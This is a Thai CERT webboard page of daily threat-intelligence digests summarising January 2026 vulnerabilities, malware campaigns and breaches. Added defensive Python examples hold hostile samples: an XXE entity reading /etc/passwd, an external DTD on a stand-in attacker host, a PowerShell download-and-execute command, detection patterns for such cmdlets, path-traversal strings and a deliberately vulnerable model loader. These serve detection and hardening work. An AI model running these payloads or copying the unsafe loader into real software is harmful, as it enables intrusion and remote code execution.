NCSA Webboard

    Posts created by NCSA_THAICERT

    • Broadcom Wi-Fi chipset vulnerability can be abused to disrupt 5GHz networks until they are unusable, even with WPA2/WPA3 enabled


      Follow the news on this webboard or on the NCSA Thailand Facebook page.

      Posted in Cyber Security News by NCSA_THAICERT
    • Belgian hospital AZ Monica shuts down servers after a cyberattack



      Posted in Cyber Security News by NCSA_THAICERT
    • 'Most severe AI vulnerability to date' found in the ServiceNow platform, risking full takeover of the system



      Posted in Cyber Security News by NCSA_THAICERT
    • Cyber Threat Intelligence 14 January 2026

      New Tooling

      • AuraInspector: Auditing Salesforce Aura For Data Exposure
        "Mandiant is releasing AuraInspector, a new open-source tool designed to help defenders identify and audit access control misconfigurations within the Salesforce Aura framework. Salesforce Experience Cloud is a foundational platform for many businesses, but Mandiant Offensive Security Services (OSS) frequently identifies misconfigurations that allow unauthorized users to access sensitive data including credit card numbers, identity documents, and health information. These access control gaps often go unnoticed until it is too late."
        https://cloud.google.com/blog/topics/threat-intelligence/auditing-salesforce-aura-data-exposure
        https://github.com/google/aura-inspector
        https://www.theregister.com/2026/01/13/mandiant_salesforce_tool/
        https://www.helpnetsecurity.com/2026/01/13/aurainspector-open-source-tool-salesforce-aura/

      Vulnerabilities

      • Adobe Patches Critical Apache Tika Bug In ColdFusion
        "Adobe has released security updates for 11 products on January 2026 Patch Tuesday, addressing a total of 25 vulnerabilities, including a critical code execution flaw. The critical-severity issue, tracked as CVE-2025-66516 (CVSS score of 10/10), is an XML External Entity (XXE) injection bug in Apache Tika modules that could be exploited via XFA files placed inside PDF documents. The security defect was patched in early December, when Apache warned that successful exploitation could lead to information leaks, SSRF attacks, denial-of-service (DoS), or remote code execution (RCE)."
        https://www.securityweek.com/adobe-patches-critical-apache-tika-bug-in-coldfusion/
      • SAP’s January 2026 Security Updates Patch Critical Vulnerabilities
        "Enterprise software maker SAP on Tuesday announced the release of 17 new security notes as part of its January 2026 Security Patch Day. Four of the notes address critical-severity vulnerabilities. The first note in SAP’s January 2026 advisory resolves CVE-2026-0501 (CVSS score of 9.9), a critical SQL injection bug in S/4HANA. The issue impacts a Remote Function Call-enabled module relying on the ABAP Database Connectivity (ADBC) framework for the execution of a native SQL statement, explains Onapsis, which discovered and reported the bug."
        https://www.securityweek.com/saps-january-2026-security-updates-patch-critical-vulnerabilities/
      • Microsoft January 2026 Patch Tuesday Fixes 3 Zero-Days, 114 Flaws
        "Today is Microsoft's January 2026 Patch Tuesday with security updates for 114 flaws, including one actively exploited and two publicly disclosed zero-day vulnerabilities. This Patch Tuesday also addresses eight "Critical" vulnerabilities, 6 of which are remote code execution flaws and 2 are elevation-of-privilege flaws."
        https://www.bleepingcomputer.com/news/microsoft/microsoft-january-2026-patch-tuesday-fixes-3-zero-days-114-flaws/
        https://www.darkreading.com/application-security/microsofts-starts-2026-bang-zero-day
        https://blog.talosintelligence.com/microsoft-patch-tuesday-january-2026/
        https://cyberscoop.com/microsoft-patch-tuesday-january-2026/
        https://www.securityweek.com/microsoft-patches-exploited-windows-zero-day-111-other-vulnerabilities/
        https://www.theregister.com/2026/01/14/patch_tuesday_january_2026/
      • 'Most Severe AI Vulnerability To Date' Hits ServiceNow
        "Authentication issues in ServiceNow potentially opened the door for arbitrary attackers to gain full control over the entire platform and access to the various systems connected to it. ServiceNow is a Fortune 500 company that, according to its promotional materials, acts as an IT services management platform for 85% of the companies that comprise the rest of the Fortune 500. That alone makes it a critical supply chain risk to the US business sector. Beyond that, ServiceNow is deeply integrated into its customers' broader IT infrastructure, more so than most vendors: ServiceNow's tentacles spread through HR, customer service, security, and the various other systems that keep a company running. To an attacker, it's both an ideal launchpad for lateral movement and a treasure trove of sensitive operational and customer data in its own right."
        https://www.darkreading.com/remote-workforce/ai-vulnerability-servicenow
        https://thehackernews.com/2026/01/servicenow-patches-critical-ai-platform.html
        https://cyberscoop.com/servicenow-fixes-critical-ai-vulnerability-cve-2025-12420/
      • CyRC Advisory: Vulnerability In Broadcom Chipset Causes Network Disruption And Client Disconnection On Wireless Routers
        "The Black Duck Cybersecurity Research Center (CyRC) discovered an issue while testing the interoperability of the Defensics® Fuzzing with 802.11 protocol test suites against ASUS routers. During testing, the CyRC team found Defensics anomaly test cases that caused the network to stop working until the router was manually reset. This vulnerability allows an attacker to make the access point unresponsive to all clients and terminate any ongoing client connections. If data transmission to subsequent systems is ongoing, the data may become corrupted or, at minimum, the transmission will be interrupted."
        https://www.blackduck.com/blog/cyrc-discovers-asus-tplink-wlan-vulnerabilities.html
        https://www.securityweek.com/broadcom-wi-fi-chipset-flaw-allows-hackers-to-disrupt-networks/
        https://www.bankinfosecurity.com/one-simple-trick-to-knock-out-wi-fi-network-a-30502
      • Remote Code Execution With Modern AI/ML Formats And Libraries
        "We identified vulnerabilities in three open-source artificial intelligence/machine learning (AI/ML) Python libraries published by Apple, Salesforce and NVIDIA on their GitHub repositories. Vulnerable versions of these libraries allow for remote code execution (RCE) when a model file with malicious metadata is loaded."
        https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/
        https://www.theregister.com/2026/01/13/ai_python_library_bugs_allow/
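      Added example for the Adobe/Apache Tika item above (not code from the advisories or from ColdFusion): the XXE class behind CVE-2025-66516 is an XML parser that resolves entity declarations pointing at resources outside the document. The Python function below, written for this digest, parses with the standard-library expat parser and refuses any external DTD or external entity before it can be resolved. The XFA-style samples are constructed for illustration, and the function assumes the XML has already been extracted from the PDF container.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when the document tries to pull in content from outside itself."""


# Constructed samples (not taken from any advisory): a benign XFA-style fragment,
# one with a harmless internal entity, one declaring an external entity the way an
# XXE payload does, and one pointing the DOCTYPE at an external DTD.
BENIGN_XML = b'<?xml version="1.0"?><xdp><field>hello</field></xdp>'
INTERNAL_ENTITY_XML = (b'<?xml version="1.0"?><!DOCTYPE xdp [<!ENTITY v "ok">]>'
                       b'<xdp><field>&v;</field></xdp>')
XXE_XML = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE xdp [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           b'<xdp><field>&xxe;</field></xdp>')
EXTERNAL_DTD_XML = (b'<?xml version="1.0"?>'
                    b'<!DOCTYPE xdp SYSTEM "http://attacker.example/evil.dtd">'
                    b'<xdp/>')


def parse_xml_strict(data: bytes):
    """Parse XML with expat but refuse anything that reaches outside the document.

    Returns (element_names, concatenated_text). Raises UnsafeXML on:
      * a DOCTYPE that references an external DTD,
      * any entity declared with a SYSTEM or PUBLIC identifier,
      * any attempt by the parser to resolve an external entity.
    Exceptions raised inside expat handlers propagate out of Parse().
    """
    parser = expat.ParserCreate()
    names, chunks = [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            raise UnsafeXML(f"external DTD for <!DOCTYPE {name}>: {system_id!r}")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            raise UnsafeXML(f"external entity {name!r} -> {system_id!r}")

    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXML(f"external entity reference to {system_id!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return names, "".join(chunks)


def is_safe(data: bytes) -> bool:
    """True if the document parses without touching external resources."""
    try:
        parse_xml_strict(data)
        return True
    except UnsafeXML:
        return False


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_XML), ("internal entity", INTERNAL_ENTITY_XML),
                       ("xxe", XXE_XML), ("external dtd", EXTERNAL_DTD_XML)]:
        print(f"{label:16} safe={is_safe(doc)}")
```

      The internal-entity sample is accepted on purpose: the check targets external resolution (file, http, SSRF-style URLs), not DTDs as such. A stricter deployment can additionally reject any DOCTYPE, which also removes entity-expansion denial of service.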
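      Added example for the Unit 42 item above (not code from the Apple, Salesforce or NVIDIA libraries, whose exact bug is not described on this page): the general pattern behind "malicious metadata leads to RCE" is a loader that turns a string found in the model file into a callable. The metadata below is constructed, and the field names "class" and "args" are assumptions for illustration; load_unsafe shows why dynamic name resolution is attacker-controlled code execution (it deliberately calls the harmless os.getcwd), and load_safe restricts construction to an explicit registry.

```python
import importlib
import json
from typing import Any, Callable, Dict


class Linear:
    """Stand-in for a model layer the loader is meant to reconstruct."""

    def __init__(self, in_features: int, out_features: int):
        self.in_features, self.out_features = in_features, out_features


# Explicit registry: the only things metadata may ask the loader to build.
LAYER_REGISTRY: Dict[str, Callable[..., Any]] = {"Linear": Linear}

# Constructed metadata (not from the Unit 42 report); "class" and "args" are
# assumed field names. The malicious one names an arbitrary stdlib callable.
TRUSTED_METADATA = json.dumps(
    {"class": "Linear", "args": {"in_features": 4, "out_features": 2}})
MALICIOUS_METADATA = json.dumps({"class": "os:getcwd", "args": {}})
BAD_ARGS_METADATA = json.dumps({"class": "Linear", "args": {"in_features": [1]}})


def load_unsafe(metadata_json: str) -> Any:
    """Vulnerable pattern: unknown names fall back to a dynamic import, so the
    author of the model file chooses which callable runs and with what arguments."""
    meta = json.loads(metadata_json)
    spec = meta["class"]
    target = LAYER_REGISTRY.get(spec)
    if target is None:
        module_name, attr = spec.split(":", 1)
        target = getattr(importlib.import_module(module_name), attr)
    return target(**meta.get("args", {}))


def load_safe(metadata_json: str) -> Any:
    """Hardened: registry lookup only, plus a shape check on the arguments."""
    meta = json.loads(metadata_json)
    spec = meta.get("class")
    if spec not in LAYER_REGISTRY:
        raise ValueError(f"refusing unregistered class {spec!r}")
    args = meta.get("args", {})
    if not isinstance(args, dict) or not all(
            isinstance(v, (int, float, str, bool)) for v in args.values()):
        raise ValueError("args must be a flat mapping of scalars")
    return LAYER_REGISTRY[spec](**args)


def accepts(metadata_json: str) -> bool:
    """True if the hardened loader would construct something from this metadata."""
    try:
        load_safe(metadata_json)
        return True
    except (ValueError, TypeError):
        return False


if __name__ == "__main__":
    print("unsafe loader ran attacker-chosen callable, got:", load_unsafe(MALICIOUS_METADATA))
    print("safe loader accepts malicious metadata:", accepts(MALICIOUS_METADATA))
```

      The same allowlist discipline applies to pickle-based formats (a restricted Unpickler that overrides find_class) and to any "custom object" hook in a model format: resolve names against a fixed table, never against the import system.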

      Malware

      • Ukraine's Army Targeted In New Charity-Themed Malware Campaign
        "Officials of Ukraine's Defense Forces were targeted in a charity-themed campaign between October and December 2025 that delivered backdoor malware called PluggyApe. Ukraine's CERT says in a report that the attacks were likely launched by the Russian threat group known as 'Void Blizzard' and 'Laundry Bear', although there is medium confidence in attribution. Laundry Bear is the same threat group responsible for breaching the Dutch police's internal systems in 2024 and stealing sensitive information about officers."
        https://www.bleepingcomputer.com/news/security/ukraines-army-targeted-in-new-charity-themed-malware-campaign/
        https://therecord.media/kremlin-linked-hackers-pose-as-charities-spy-ukraine
      • Unveiling VoidLink – A Stealthy, Cloud-Native Linux Malware Framework
        "In December 2025, Check Point Research identified a small cluster of previously unseen Linux malware samples that appear to originate from a Chinese-affiliated development environment. Many of the binaries included debug symbols and other development artifacts, suggesting we were looking at in-progress builds rather than a finished, widely deployed tool. The speed and variety of changes across the samples indicate a framework that is being iterated upon quickly to achieve broader, real-world use."
        https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/
        https://thehackernews.com/2026/01/new-advanced-linux-voidlink-malware.html
        https://www.bleepingcomputer.com/news/security/new-voidlink-malware-framework-targets-linux-cloud-servers/
        https://www.infosecurity-magazine.com/news/chinese-malware-framework-linux/
      • Convincing LinkedIn Comment-Reply Tactic Used In New Phishing
        "Scammers are flooding LinkedIn posts this week with fake "reply" comments that appear to come from the platform itself, warning users of bogus policy violations and urging them to visit an external link. The messages convincingly impersonate LinkedIn branding and in some cases even use the company’s official lnkd.in URL shortener, making the phishing links harder to distinguish from legitimate ones."
        https://www.bleepingcomputer.com/news/security/convincing-linkedin-comment-reply-tactic-used-in-new-phishing/
      • Silent Push Uncovers New Magecart Network: Disrupting Online Shoppers Worldwide
        "While investigating intelligence shared with us, a set of indicators that were also found on our Bulletproof Host Indicators Of Future Attack™ (IOFA™) feeds, our team discovered a vast network of domains related to a long-term and ongoing credit card skimming campaign. Current findings suggest this campaign has been active for several years, dating back to the beginning of 2022. This campaign utilizes scripts targeting at least six major payment network providers: American Express, Diners Club, Discover (a subsidiary of Capital One), JCB Co., Ltd., Mastercard, and UnionPay. Enterprise organizations that are clients of these payment providers are the most likely to be impacted."
        https://www.silentpush.com/blog/magecart/
        https://thehackernews.com/2026/01/long-running-web-skimming-campaign.html
        https://www.bankinfosecurity.com/magecart-hits-continue-stripe-spoofing-supply-chain-risks-a-30507
        https://hackread.com/magecart-targets-all-credit-cards-users/
        https://www.infosecurity-magazine.com/news/global-magecart-campaign-six-card/
      • DeVixor: An Evolving Android Banking RAT With Ransomware Capabilities Targeting Iran
        "deVixor is an actively developed Android banking malware campaign operating at scale, targeting Iranian users through phishing websites that masquerade as legitimate automotive businesses. Distributed as malicious APK files, deVixor has evolved from a basic SMS-harvesting threat into a fully featured Remote Access Trojan (RAT) that combines banking fraud, credential theft, ransomware, and persistent device surveillance within a single platform."
        https://cyble.com/blog/devixor-an-evolving-android-banking-rat-with-ransomware-capabilities-targeting-iran/
      • SHADOW#REACTOR – Text-Only Staging, .NET Reactor, And In-Memory Remcos RAT Deployment
        "The Securonix Threat Research team has analyzed a multi-stage Windows malware campaign tracked as SHADOW#REACTOR. The infection chain follows a tightly orchestrated execution path: an obfuscated VBS launcher executed via wscript.exe invokes a PowerShell downloader, which retrieves fragmented, text-based payloads from a remote host. These fragments are reconstructed into encoded loaders, decoded in memory by a .NET Reactor–protected assembly, and used to fetch and apply a remote Remcos configuration. The final stage leverages MSBuild.exe as a living-off-the-land binary (LOLBin) to complete execution, after which the Remcos RAT backdoor is fully deployed and takes control of the compromised system."
        https://www.securonix.com/blog/shadowreactor-text-only-staging-net-reactor-and-in-memory-remcos-rat-deployment/
        https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html
        https://www.darkreading.com/endpoint-security/shadow-reactor-uses-text-files-to-deliver-remcos-rat
        https://www.infosecurity-magazine.com/news/shadowreactor-text-staging-remcos/
      • Malicious Chrome Extension Steals MEXC API Keys By Masquerading As Trading Tool
        "Cybersecurity researchers have disclosed details of a malicious Google Chrome extension that's capable of stealing API keys associated with MEXC, a centralized cryptocurrency exchange (CEX) available in over 170 countries, while masquerading as a tool to automate trading on the platform. The extension, named MEXC API Automator (ID: pppdfgkfdemgfknfnhpkibbkabhghhfh), has 29 downloads and is still available on the Chrome Web Store as of writing. It was first published on September 1, 2025, by a developer named "jorjortan142.""
        https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html
      • Key Insights On SHADOW-AETHER-015 And Earth Preta From The 2025 MITRE ATT&CK Evaluation With Trend Vision One™
        "This blog examines notable modern techniques, tactics, and procedures (TTPs) that Trend Research™ has observed in the two emulations during the MITRE ATT&CK Evaluation Round 7 (ER7 2025) that featured Earth Preta (also known as Mustang Panda), and SHADOW-AETHER-015 (Trend Research’s intrusion name for a particular group of activities with modern TTPs characterized by AI-generated attacks, sophisticated phishing attacks, and/or social engineering). These observed, analyzed, and reported TTPs support the performance of Trend Vision One™ in ER7, reinforcing the position of TrendAI™ as a trusted leader in detection and response innovation."
        https://www.trendmicro.com/en_us/research/26/a/shadow-aether-015-earth-preta-mitre.html
      • Stealthy Malware Masking Its Activity, Deploying Infostealer
        "Our experts have detected a new wave of malicious emails targeting Russian private-sector organizations. The goal of the attack is to infect victims’ computers with an infostealer. This campaign is particularly noteworthy because the attackers tried to disguise their activity as the operations of legitimate software and traffic to the ubiquitously-used state and municipal services website."
        https://www.kaspersky.com/blog/malicious-mailing-masking-activity/55104/
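      Added example for the SHADOW#REACTOR item above (not Securonix's detection content): the chain it describes is visible in process-creation telemetry such as Sysmon Event ID 1. The events below are constructed, with PIDs, user name and file paths chosen for illustration; detect() flags a script host spawning PowerShell, download or inline-execution cmdlets on the PowerShell command line, and MSBuild.exe spawned by PowerShell, and reports the full wscript to powershell to MSBuild chain when all three line up.

```python
import re

# Constructed process-creation events, one per process, in the shape a Sysmon
# Event ID 1 feed would provide. PIDs, user and paths are illustrative only.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\Downloads\invoice.vbs"'},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"$p=(New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.5/part1.txt');iex $p\""},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\victim\AppData\Local\Temp\build.xml"},
    # Benign control: a developer build launched from Explorer, no script host above it.
    {"pid": 500, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app.csproj"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Cmdlets and .NET calls typically used to fetch text payloads and run them in memory.
DOWNLOAD_OR_INLINE_EXEC = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"frombase64string|\biex\b|invoke-expression", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule_name) pairs for events matching the staging pattern."""
    by_pid = {e["pid"]: e for e in events}   # assumes PIDs are unique in the window
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if name in SHELLS and pname in SCRIPT_HOSTS:
            findings.append((e["pid"], "script_host_spawns_powershell"))
        if name in SHELLS and DOWNLOAD_OR_INLINE_EXEC.search(e["cmdline"]):
            findings.append((e["pid"], "powershell_download_or_inline_exec"))
        if name == "msbuild.exe" and pname in SHELLS:
            findings.append((e["pid"], "powershell_spawns_msbuild"))
            grandparent = by_pid.get(parent["ppid"])
            if grandparent and basename(grandparent["image"]) in SCRIPT_HOSTS:
                findings.append((e["pid"], "script_host_powershell_msbuild_chain"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

      The parent-chain rule is the low-noise one: PowerShell fetching text over HTTP happens in legitimate administration, but MSBuild.exe whose grandparent is wscript.exe almost never does. In a real pipeline, PID reuse means the lookup should be keyed on process GUIDs or (pid, start time) rather than the bare PID used here.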

      Breaches/Hacks/Leaks

      • Belgian Hospital AZ Monica Shuts Down Servers After Cyberattack
        "Belgian hospital AZ Monica was forced to shut down all servers, cancel scheduled procedures, and transfer critical patients earlier today due to a cyberattack. The hospital, which operates campuses in Antwerp and Deurne, disconnected all servers at 6:32 AM after its systems were hit. The cyberattack also forced the hospital to suspend all scheduled procedures on Tuesday, as the emergency department continues to operate at reduced capacity, even though emergency medical services and intensive care transport units remain offline."
        https://www.bleepingcomputer.com/news/security/belgian-hospital-az-monica-shuts-down-servers-after-cyberattack/
        https://securityaffairs.com/186882/cyber-crime/az-monica-hospital-in-belgium-shuts-down-servers-after-cyberattack.html
      • Central Maine Healthcare Breach Exposed Data Of Over 145,000 People
        "A data breach last year at Central Maine Healthcare (CMH) exposed sensitive information of more than 145,000 individuals. The hackers persisted on the organization's systems for more than two months last year, between March 19 and June 1, when CMH discovered the intrusion. The CMH integrated healthcare delivery system serves at least 400,000 people and manages hospitals like Central Maine Medical Center (CMMC), Bridgton Hospital, and Rumford Hospital."
        https://www.bleepingcomputer.com/news/security/central-maine-healthcare-breach-exposed-data-of-over-145-000-people/
      • Betterment Confirms Data Breach After Wave Of Crypto Scam Emails
        "U.S. digital investment advisor Betterment confirmed that hackers breached its systems and sent fake crypto-related messages to some customers. The threat actor last week delivered fraudulent emails from Betterment infrastructure, luring recipients into a reward scam disguised as a company promotion that claimed to triple the amount of cryptocurrency sent to a specific address."
        https://www.bleepingcomputer.com/news/security/betterment-confirms-data-breach-after-wave-of-crypto-scam-emails/
      • After Goldman, JPMorgan Discloses Law Firm Data Breach
        "JPMorgan Chase is informing some investors about a data breach stemming from a recent cybersecurity incident at an outside law firm. The same incident triggered a similar data breach notice from Goldman Sachs in December 2025. The Maine Attorney General’s Office requires companies that have suffered a data breach impacting the state’s residents to submit a report and a copy of the notification letter sent to affected individuals."
        https://www.securityweek.com/after-goldman-jpmorgan-discloses-law-firm-data-breach/
      • Suspected Ransomware Attack Threatens One Of South Korea’s Largest Companies
        "Kyowon Group, one of South Korea’s largest education and lifestyle companies, announced shutting down key parts of its internal computer network this weekend following what it described as a suspected ransomware attack. In a company statement, Kyowon said it identified abnormal activity on Saturday morning, triggering an emergency response plan to isolate the affected servers and prevent hackers compromising more of its systems."
        https://therecord.media/kyowon-group-south-korea-suspected-ransomware-attack

      General News

      • AI Supply Chain Risk: Will CIOs Be Held Accountable?
        "When reports of Korean Air losing sensitive data on tens of thousands of employees surfaced, the incident was initially seen as a routine data breach. But reports soon indicated the exposure stemmed from a supply chain attack on a catering vendor responsible for in-flight meals and duty-free retail operations. But the vendor was running Oracle E-Business Suite, which contained a critical-severity vulnerability tracked as CVE-2025-61882. The flaw was discovered in early October 2025, after several enterprises reportedly received emails from attackers claiming to have already exploited the flaw to gain access and steal data."
        https://www.bankinfosecurity.com/blogs/ai-supply-chain-risk-will-cios-be-held-accountable-p-4024
      • Building a Solid IT Strategy In An Unstable World
        "It's not surprising in today's world to wake up to news of dramatic changes in the geopolitical climate, of protests erupting overnight that could destabilize governments, or of nation-state actors launching cyberattacks. Geopolitical instability is a part of reality in 2026, and the stakes are high for CIOs who must rely on global supply chains to develop IT, artificial intelligence, cloud and cybersecurity strategies."
        https://www.bankinfosecurity.com/building-solid-strategy-in-unstable-world-a-30512
      • Latin America Sees Sharpest Rise In Cyber Attacks In December 2025 As Ransomware Activity Accelerates
        "In December 2025, organizations experienced an average of 2,027 cyber attacks per organization per week. This represents a 1% month-over-month increase and a 9% year-over-year increase. While overall growth remained moderate, Latin America recorded the sharpest regional increase, with organizations experiencing an average of 3,065 attacks per week, a 26% increase year over year. The data points to sharper regional and sector-level spikes in activity, driven primarily by ransomware operations and expanding exposure linked to enterprise adoption of generative AI (GenAI)."
        https://blog.checkpoint.com/research/latin-america-sees-sharpest-rise-in-cyber-attacks-in-december-2025-as-ransomware-activity-accelerates/
      • Doctor Web’s Q4 2025 Review Of Virus Activity On Mobile Devices
        "According to detection statistics collected by Dr.Web Security Space for mobile devices, the trojans Android.MobiDash and Android.HiddenAds, which display intrusive ads, were again the most widespread Android threats. At the same time, their activity decreased, and they were detected less frequently on protected devices by 43.24% and 18.06%, respectively. These malicious programs were followed by trojans from the Android.Siggen family, which includes malware whose functionality varies. They were also detected less often—by 27.47%."
        https://news.drweb.com/show/review/?lng=en&i=15101
        https://hackread.com/q4-2025-malware-telegram-backdoor-joker-google-play/
      • Rakuten Viber CISO/CTO On Balancing Encryption, Abuse Prevention, And Platform Resilience
        "In this Help Net Security interview, Liad Shnell, CISO and CTO at Rakuten Viber, discusses how messaging platforms have become critical infrastructure during crises and conflicts. He explains how it influences cybersecurity priorities, from encryption and abuse prevention to incident response and user protection. Shnell also outlines how Viber assesses and mitigates risks that blend technical threats with human behavior."
        https://www.helpnetsecurity.com/2026/01/13/liad-shnell-rakuten-viber-messaging-cybersecurity-risks/
      • Teaching Cybersecurity By Letting Students Break Things
        "Cybersecurity students show higher engagement when the work feels tangible. A new study from Airbus Cybersecurity and Dauphine University describes what happens when courses move beyond lectures and place students inside structured hacking scenarios, social engineering exercises, and competitive games."
        https://www.helpnetsecurity.com/2026/01/13/gamified-cybersecurity-training-study/
        https://www.mdpi.com/2624-800X/6/1/16
      • What Insurers Expect From Cyber Risk In 2026
        "Technology shifts, policy decisions, and attacker behavior are changing at the same time, and their effects increasingly overlap. Insurers, brokers, and security teams are feeling that pressure across underwriting, claims, and risk management. A new global study by CyberCube examines how these changes are expected to influence cyber risk through 2026. AI remains a top priority across the insurance sector, though adoption still trails ambition. 82% of insurance leaders say AI ranks as a top business imperative. Deployment at scale remains limited."
        https://www.helpnetsecurity.com/2026/01/13/cybercube-insurance-cyber-risk-2026/
      • Cyber Insights 2026: External Attack Surface Management
        "Shadows are dark and dangerous places where bad guys attack anything or anyone they find. In 2026, AI will increase the number and size of shadows, together with the entire external attack surface. External Attack Surface Management (EASM) is the process of finding and managing every asset an organization exposes to the internet. Those assets may be known (and therefore documented and may be secured) or unknown (and therefore invisible and almost certainly insecure). While EASM covers both categories, we are primarily concerned with the invisible assets."
        https://www.securityweek.com/cyber-insights-2026-external-attack-surface-management/
      • More Than 40 Countries Impacted By North Korea IT Worker Scams, Crypto Thefts
        "The U.S. on Monday urged United Nation member states to take a tougher stance against North Korean efforts to skirt sanctions through its IT worker scheme and cryptocurrency heists. Eleven countries led a session at the UN headquarters in New York centered around a 140-page report released last fall that covered North Korea’s extensive cyber-focused efforts to fund its nuclear and ballistic weapons program. The report links the North Korean IT worker scheme — where citizens of the country steal identities and secure employment at western companies — with Pyongyang’s billion-dollar crypto thefts."
        https://therecord.media/40-countries-impacted-nk-it-thefts-united-nations
      • Dutch Cops Cuff Alleged AVCheck Malware Kingpin In Amsterdam
        "Dutch police believe they have arrested a man behind the AVCheck online platform - a service used by cybercrims that Operation Endgame shuttered in May. The country's public prosecutor's office (LP) issued a statement on Monday, confirming the arrest of a 33-year-old Dutchman in connection with its investigation into the malware service, without specifying it or the man by name."
        https://www.theregister.com/2026/01/13/avcheck_arrest/

      Reference
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News by NCSA_THAICERT
    • Fake performance-review emails carry malicious attachments that install GuLoader and Remcos RAT



      Posted in Cyber Security News by NCSA_THAICERT
    • Everest ransomware claims to have breached Nissan and stolen more than 900GB of data



      Posted in Cyber Security News by NCSA_THAICERT
    • Hackers use the Browser-in-the-Browser (BitB) technique to create fake login windows that capture Facebook passwords



      Posted in Cyber Security News by NCSA_THAICERT
    • Cyber Threat Intelligence 13 January 2026

      Vulnerabilities

      • Max Severity Ni8mare Flaw Impacts Nearly 60,000 n8n Instances
        "Nearly 60,000 n8n instances exposed online remain unpatched against a maximum-severity vulnerability dubbed "Ni8mare." n8n is an open-source workflow automation platform that allows users to connect different applications and services via pre-built connectors and a visual, node-based interface to automate repetitive tasks without writing code. The automation platform is widely used in AI development to automate data ingestion and build AI agents and RAG pipelines. It has over 100 million pulls on Docker Hub and over 50,000 weekly downloads on npm."
        https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-impacts-nearly-60-000-n8n-instances/
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-8110 Gogs Path Traversal Vulnerability"
        https://www.cisa.gov/news-events/alerts/2026/01/12/cisa-adds-one-known-exploited-vulnerability-catalog
        https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-gogs-rce-flaw-exploited-in-zero-day-attacks/
        https://securityaffairs.com/186837/hacking/u-s-cisa-adds-a-flaw-in-gogs-to-its-known-exploited-vulnerabilities-catalog.html
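      Added example for the Gogs KEV item above. This is not Gogs code and not a reproduction of CVE-2025-8110, whose exact trigger is not described on this page; it shows the general defence against path traversal in a handler that reads or writes files under a repository directory: resolve the requested path against the base directory and reject anything that lands outside it. safe_join uses os.path.realpath, which also follows symbolic links, so a link inside the tree that points outside is rejected as well. The base path /srv/repos is assumed for illustration and a POSIX filesystem is assumed throughout.

```python
import os
import tempfile


class PathTraversal(ValueError):
    """Raised when a user-supplied path would leave the base directory."""


def safe_join(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir and return the canonical absolute path.

    Rejects NUL bytes, absolute user paths, and any result whose canonical form
    is not inside the canonical base directory. realpath() normalises '..'
    components and follows symlinks that exist on disk, so an escaping link is
    caught as well as a lexical '../' escape.
    """
    if "\x00" in user_path:
        raise PathTraversal("NUL byte in path")
    if os.path.isabs(user_path):
        raise PathTraversal(f"absolute path not allowed: {user_path!r}")
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_real, user_path))
    if os.path.commonpath([base_real, target]) != base_real:
        raise PathTraversal(f"{user_path!r} escapes {base_dir!r}")
    return target


def is_inside(base_dir: str, user_path: str) -> bool:
    """True if safe_join would accept the path."""
    try:
        safe_join(base_dir, user_path)
        return True
    except PathTraversal:
        return False


def demo_symlink_escape() -> bool:
    """Create repos/escape -> (directory above the temp dir) and confirm that a
    request through the link is rejected. Returns True when the check holds."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "repos")
        os.mkdir(base)
        outside = os.path.dirname(os.path.realpath(tmp))
        os.symlink(outside, os.path.join(base, "escape"))
        return not is_inside(base, "escape/secret.txt")


if __name__ == "__main__":
    for p in ["alice/app.git/HEAD", "../../etc/passwd", "alice/../../etc/passwd",
              "/etc/passwd", "alice/../bob/app.git"]:
        print(f"{p!r:32} inside={is_inside('/srv/repos', p)}")
    print("symlink escape rejected:", demo_symlink_escape())
```

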